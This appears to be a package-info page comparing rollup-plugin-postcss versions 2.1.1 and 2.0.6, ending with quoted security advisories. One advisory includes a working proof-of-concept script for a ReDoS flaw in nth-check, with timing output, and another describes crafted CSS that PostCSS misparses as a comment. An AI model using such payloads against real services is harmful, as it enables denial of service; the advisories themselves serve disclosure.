Rollup Plugin PostCSS offers seamless integration of PostCSS within Rollup workflows, enabling developers to effortlessly process CSS files using the extensive PostCSS ecosystem. Comparing versions 2.1.1 and 2.0.6, the core functionality remains consistent, providing a robust solution for managing CSS transformations. Both versions support popular PostCSS plugins such as cssnano for minification and autoprefixer for vendor prefixing. Key dependencies like postcss, postcss-load-config, and postcss-modules are present in both, ensuring compatibility with a wide range of PostCSS configurations and CSS Modules.
The significant difference lies in the dist object. Version 2.1.1 offers a slightly larger unpacked size of 35750 bytes compared to 2.0.6's 35697, suggesting minor code refinements or updates that do not significantly impact the plugin's overall structure or features. Most developers would likely find both versions equally suitable. The release date reveals that version 2.1.1 was released on February 22, 2020, indicating a more recent update compared to version 2.0.6's release on February 3, 2020. Choosing the newer version is generally recommended for stability and the benefit of any underlying bug fixes or performance improvements. Regardless of the specific version, developers leverage this plugin to streamline their CSS pipelines by integrating PostCSS processing directly into their Rollup build process.
All the vulnerabilities related to the version 2.1.1 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.